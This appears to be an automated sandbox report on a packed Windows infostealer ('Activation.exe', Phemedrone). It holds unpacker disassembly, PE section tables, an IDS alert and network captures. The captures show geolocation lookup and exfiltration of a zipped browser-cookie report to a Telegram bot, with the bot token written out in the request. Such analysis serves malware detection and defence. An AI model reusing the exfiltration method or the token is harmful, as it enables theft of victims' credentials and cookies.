                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc eax, eax
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc eax, eax
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc eax, eax
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc eax, eax
                                                                                      je 00007F6B40CD8BBAh
                                                                                      push edi
                                                                                      mov eax, eax
                                                                                      sub edi, eax
                                                                                      mov al, byte ptr [edi]
                                                                                      pop edi
                                                                                      mov byte ptr [edi], al
                                                                                      inc edi
                                                                                      mov ebx, 00000002h
                                                                                      jmp 00007F6B40CD8B4Bh
                                                                                      mov eax, 00000001h
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc eax, eax
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      jc 00007F6B40CD8B9Ch
                                                                                      sub eax, ebx
                                                                                      mov ebx, 00000001h
                                                                                      jne 00007F6B40CD8BDAh
                                                                                      mov ecx, 00000001h
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc ecx, ecx
                                                                                      add dl, dl
                                                                                      jne 00007F6B40CD8BB7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      jc 00007F6B40CD8B9Ch
                                                                                      push esi
                                                                                      mov esi, edi
                                                                                      sub esi, ebp
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2403a0x50.imports
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x260000x5c0.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      0x20000x1e0000xe06a0a7a4d1f98f58e4112d33fb1e99f24a2False1.0004525674499565data7.9859308748687345IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      0x200000x5be0x299bc596e8d3a7b5713dcb1220c0cba7e28False1.0165413533834586data7.617134030526502IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      0x220000xc0xfd62928ee2fe5646fc9cd8c5ffbff9f7fFalse1.6data3.906890595608518IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                      .imports0x240000x20000x200a7cbe73c362247cc12a9acc1ef31a2c6False0.16796875data1.1486424297373619IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0x260000x20000x600cc36ad3b2feeeb075ddda0ecdac14894False0.4244791666666667data4.165617506167152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .themida0x280000x5460000x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .boot0x56e0000x325a000x3258bbc07bf4455b809e2b473dffd8fc047c8funknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_VERSION0x260900x334dataEnglishUnited States0.424390243902439
                                                                                      RT_MANIFEST0x263d40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminatorsEnglishUnited States0.5489795918367347
                                                                                      DLLImport
                                                                                      kernel32.dllGetModuleHandleA
                                                                                      mscoree.dll_CorExeMain
                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishUnited States
                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-12-04T15:12:01.549797+01002843856ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M21192.168.2.949746149.154.167.220443TCP
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 4, 2024 15:11:57.679943085 CET49739443192.168.2.9104.26.1.100
                                                                                      Dec 4, 2024 15:11:57.679996967 CET44349739104.26.1.100192.168.2.9
                                                                                      Dec 4, 2024 15:11:57.680067062 CET49739443192.168.2.9104.26.1.100
                                                                                      Dec 4, 2024 15:11:57.692023039 CET49739443192.168.2.9104.26.1.100
                                                                                      Dec 4, 2024 15:11:57.692037106 CET44349739104.26.1.100192.168.2.9
                                                                                      Dec 4, 2024 15:11:58.945065975 CET44349739104.26.1.100192.168.2.9
                                                                                      Dec 4, 2024 15:11:58.945162058 CET49739443192.168.2.9104.26.1.100
                                                                                      Dec 4, 2024 15:11:58.968452930 CET49739443192.168.2.9104.26.1.100
                                                                                      Dec 4, 2024 15:11:58.968483925 CET44349739104.26.1.100192.168.2.9
                                                                                      Dec 4, 2024 15:11:58.968751907 CET44349739104.26.1.100192.168.2.9
                                                                                      Dec 4, 2024 15:11:59.017294884 CET49739443192.168.2.9104.26.1.100
                                                                                      Dec 4, 2024 15:11:59.190481901 CET49739443192.168.2.9104.26.1.100
                                                                                      Dec 4, 2024 15:11:59.235332012 CET44349739104.26.1.100192.168.2.9
                                                                                      Dec 4, 2024 15:11:59.541938066 CET44349739104.26.1.100192.168.2.9
                                                                                      Dec 4, 2024 15:11:59.542062998 CET44349739104.26.1.100192.168.2.9
                                                                                      Dec 4, 2024 15:11:59.542129040 CET49739443192.168.2.9104.26.1.100
                                                                                      Dec 4, 2024 15:11:59.545521021 CET49739443192.168.2.9104.26.1.100
                                                                                      Dec 4, 2024 15:11:59.818268061 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:11:59.818301916 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:11:59.818448067 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:11:59.819144011 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:11:59.819158077 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.195945978 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.196017981 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.197949886 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.197957993 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.198220968 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.199647903 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.247334003 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.549436092 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.549468040 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.549521923 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.549527884 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.549575090 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.549582005 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.549680948 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.549690008 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.549710035 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.549722910 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.549817085 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.549829960 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.549906015 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.549911976 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.549927950 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.549935102 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.550237894 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.550247908 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.550273895 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.550281048 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.550292015 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.550306082 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.550328016 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.550344944 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.550434113 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.550443888 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.550445080 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.550455093 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.550470114 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.550476074 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.550493002 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.550506115 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.550693989 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.550708055 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.550735950 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.550753117 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.550858974 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.550863028 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.550916910 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.550929070 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.551022053 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.551028967 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.551042080 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.551048040 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.551062107 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.551065922 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.551083088 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.551090956 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.551219940 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.551232100 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.551270962 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.551275015 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.551322937 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.551330090 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.551595926 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.551605940 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.551620960 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.551625967 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.551649094 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.551654100 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.551687956 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.551695108 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.551706076 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.551709890 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.551829100 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.551829100 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.551836967 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.551846981 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.551866055 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.551872015 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.551892042 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.551902056 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.552078962 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.552086115 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.552103043 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.552114964 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.552129984 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.552133083 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.552316904 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.552330017 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.552340031 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.552352905 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.552362919 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.552408934 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.552491903 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.552593946 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.552674055 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.595335960 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.595648050 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.595678091 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.595702887 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.595717907 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.595808029 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.595835924 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.643326998 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.644269943 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.644387960 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:01.687335968 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.816039085 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:01.861037016 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:03.057714939 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:03.057786942 CET44349746149.154.167.220192.168.2.9
                                                                                      Dec 4, 2024 15:12:03.057912111 CET49746443192.168.2.9149.154.167.220
                                                                                      Dec 4, 2024 15:12:03.061317921 CET49746443192.168.2.9149.154.167.220
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 4, 2024 15:11:57.525448084 CET5452153192.168.2.91.1.1.1
                                                                                      Dec 4, 2024 15:11:57.672821999 CET53545211.1.1.1192.168.2.9
                                                                                      Dec 4, 2024 15:11:59.680078030 CET5253353192.168.2.91.1.1.1
                                                                                      Dec 4, 2024 15:11:59.817507029 CET53525331.1.1.1192.168.2.9
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Dec 4, 2024 15:11:57.525448084 CET192.168.2.91.1.1.10x4542Standard query (0)get.geojs.ioA (IP address)IN (0x0001)false
                                                                                      Dec 4, 2024 15:11:59.680078030 CET192.168.2.91.1.1.10xd779Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Dec 4, 2024 15:11:40.453835964 CET1.1.1.1192.168.2.90x5597No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Dec 4, 2024 15:11:40.453835964 CET1.1.1.1192.168.2.90x5597No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                      Dec 4, 2024 15:11:57.672821999 CET1.1.1.1192.168.2.90x4542No error (0)get.geojs.io104.26.1.100A (IP address)IN (0x0001)false
                                                                                      Dec 4, 2024 15:11:57.672821999 CET1.1.1.1192.168.2.90x4542No error (0)get.geojs.io172.67.70.233A (IP address)IN (0x0001)false
                                                                                      Dec 4, 2024 15:11:57.672821999 CET1.1.1.1192.168.2.90x4542No error (0)get.geojs.io104.26.0.100A (IP address)IN (0x0001)false
                                                                                      Dec 4, 2024 15:11:59.817507029 CET1.1.1.1192.168.2.90xd779No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                      • get.geojs.io
                                                                                      • api.telegram.org
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.949739104.26.1.1004437588C:\Users\user\Desktop\Activation.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-04 14:11:59 UTC76OUTGET /v1/ip/geo.json HTTP/1.1
                                                                                      Host: get.geojs.io
                                                                                      Connection: Keep-Alive
                                                                                      2024-12-04 14:11:59 UTC1122INHTTP/1.1 200 OK
                                                                                      Date: Wed, 04 Dec 2024 14:11:59 GMT
                                                                                      Content-Type: application/json
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      x-request-id: 31e8eb79ca30b52162b67535372a4f8b-ASH
                                                                                      strict-transport-security: max-age=15552000; includeSubDomains; preload
                                                                                      access-control-allow-origin: *
                                                                                      access-control-allow-methods: GET
                                                                                      pragma: no-cache
                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                      geojs-backend: ash-01
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xT6EdFCNtwhEKJpZ4D537NtXDb%2FAfAaER%2BPY99TGUMAax4SoDp0YjbYz8%2B3cvXdp6nJtTPU2cdgARiiAXZEioBg9R8C7iz7WOjbYB8g3BGf3MLeur1dqd3dAzjwZWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ecc6387ef104327-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1602&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=690&delivery_rate=1822721&cwnd=245&unsent_bytes=0&cid=b4e2af7cfea83f47&ts=611&x=0"
                                                                                      2024-12-04 14:11:59 UTC247INData Raw: 31 34 36 0d 0a 7b 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 61 63 63 75 72 61 63 79 22 3a 32 30 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 61 73 6e 22 3a 33 33 35 36 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 33 33 35 36 20 4c 45 56 45 4c 33 22 2c 22 61 72 65 61 5f 63 6f 64 65 22 3a 22 30 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 4c 45 56 45 4c 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22
                                                                                      Data Ascii: 146{"timezone":"America\/New_York","accuracy":20,"city":"New York","asn":3356,"organization":"AS3356 LEVEL3","area_code":"0","organization_name":"LEVEL3","country_code":"US","country_code3":"USA","continent_code":"NA","country":"United States","
                                                                                      2024-12-04 14:11:59 UTC86INData Raw: 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 34 30 2e 37 31 32 33 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 37 34 2e 30 30 36 38 22 2c 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d 0a 0d 0a
                                                                                      Data Ascii: region":"New York","latitude":"40.7123","longitude":"-74.0068","ip":"8.46.123.228"}
                                                                                      2024-12-04 14:11:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.949746149.154.167.2204437588C:\Users\user\Desktop\Activation.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-04 14:12:01 UTC384OUTPOST /bot7772275304:AAF3OSvWBzn5cIHkGD9ueBFz5ed91u-60-U/sendDocument HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
                                                                                      Content-Type: multipart/form-data; boundary=----------------------------8dd1443b4c42cee
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 710510
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      2024-12-04 14:12:01 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 34 34 33 62 34 63 34 32 63 65 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 38 2e 34 36 2e 31 32 33 2e 32 32 38 2d 50 68 65 6d 65 64 72 6f 6e 65 2d 52 65 70 6f 72 74 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 7c 49 84 59 ca 55 2c 10 1f 01 00 00 1f 01 00 00 28 00 48 00 42 72 6f 77 73 65 72 20 44 61 74 61 2f 43 68 72 6f 6d 65 2f 43 6f 6f 6b 69 65 73 5b 44 65 66 61 75 6c 74 5d
                                                                                      Data Ascii: ------------------------------8dd1443b4c42ceeContent-Disposition: form-data; name="document"; filename="[US]8.46.123.228-Phemedrone-Report.zip"Content-Type: application/octet-streamPK|IYU,(HBrowser Data/Chrome/Cookies[Default]
                                                                                      2024-12-04 14:12:01 UTC16355OUTData Raw: 00 7a 02 6f b4 78 d2 cf e2 49 3f 8b 27 f7 ba 61 5c 00 76 87 95 7d 1e 9e f4 b3 78 d2 cf e2 09 be 4e 78 a2 af 15 9e ec f3 f0 e4 1f 7c d0 04 60 2e 01 ed 3a 97 7c ed 72 8a 49 00 b6 12 81 43 8e ec 6b 85 27 ff 24 fa 72 01 c8 1c ac cc f3 90 d8 b3 a2 af 5d 8c 11 f1 07 cc 73 f1 97 0b 3e 44 5d 1e 13 12 79 5e 0e 6c ce ab 23 a6 6b be b9 e0 63 ae ee c0 76 54 cf 06 a4 b6 44 42 90 6e c0 d4 85 b7 ed f0 f5 5e c9 3b 46 ad 25 f1 ac e0 53 9d 6a 6d 4d 9e 53 4c f2 4f 72 d1 0a 40 0f 04 20 57 80 ed 35 60 91 cb be bc 03 50 48 d8 31 aa 33 0f 99 a7 ce 3f 4f ec 69 ad 3d ac 27 f3 1d e2 da 0a 41 e5 2d c8 3f c1 5a 02 50 1d 80 12 80 7a e6 1f a2 4d 52 4f 62 2f c9 b9 8d 63 ed 9c 45 61 ea bc 5b 93 c8 23 26 41 c7 9c 3a c9 41 d6 92 76 16 c9 41 7d 06 30 27 a6 78 6d a3 e1 37 0d 2b 2e b8 02 3c
                                                                                      Data Ascii: zoxI?'a\v}xNx|`.:|rICk'$r]s>D]y^l#kcvTDBn^;F%SjmMSLOr@ W5`PH13?Oi='A-?ZPzMROb/cEa[#&A:AvA}0'xm7+.<
                                                                                      2024-12-04 14:12:01 UTC16355OUTData Raw: 70 c8 c5 b7 87 6f ff e8 ba 82 0b 5a d1 28 00 3d c9 d7 0e 4f f6 79 48 98 79 b1 d1 30 dc fd 87 fc 3b a6 e8 fa a3 fb ef f1 23 8b f9 53 27 34 08 c0 97 6e de a1 14 80 c5 8b 40 46 2b 00 47 cb c0 49 af b8 7c f8 6c 75 00 be dc 37 be f7 fd ef 97 02 b0 ec ee 33 5d 7e 88 3f 49 3c ae f2 f2 3c 3f 4f f6 59 a8 d1 b5 5f b0 2f fe 68 12 80 fb ed ef 0a be 91 b2 c9 a5 f1 77 13 c7 fa 0f 9a 69 27 00 25 ce 98 0f c6 5a 4f de f5 03 4f ea f5 42 b7 02 70 e0 d8 46 3c 89 d7 2f 46 23 00 ff f5 5f ff 35 fc ed df fe 6d 58 7b ed b5 c3 31 c7 1c d3 14 3b f8 e0 83 53 ec a7 3f fd 69 8a 09 d6 f6 1c 8f 76 02 d0 a3 3e 4a 01 d8 80 23 f5 7a c1 93 7e 16 2b f8 da 91 8b ba 56 f1 7e 33 70 d8 30 9e d0 1b 2d 03 87 0c e3 c9 bd 3c d6 89 5c fc b5 c2 93 81 0d 38 32 6f 24 f8 5d 81 dd 63 05 e0 48 24 20 32 af
                                                                                      Data Ascii: poZ(=OyHy0;#S'4n@F+GI|lu73]~?I<<?OY_/hwi'%ZOOBpF</F#_5mX{1;S?iv>J#z~+V~3p0-<\82o$]cH$ 2
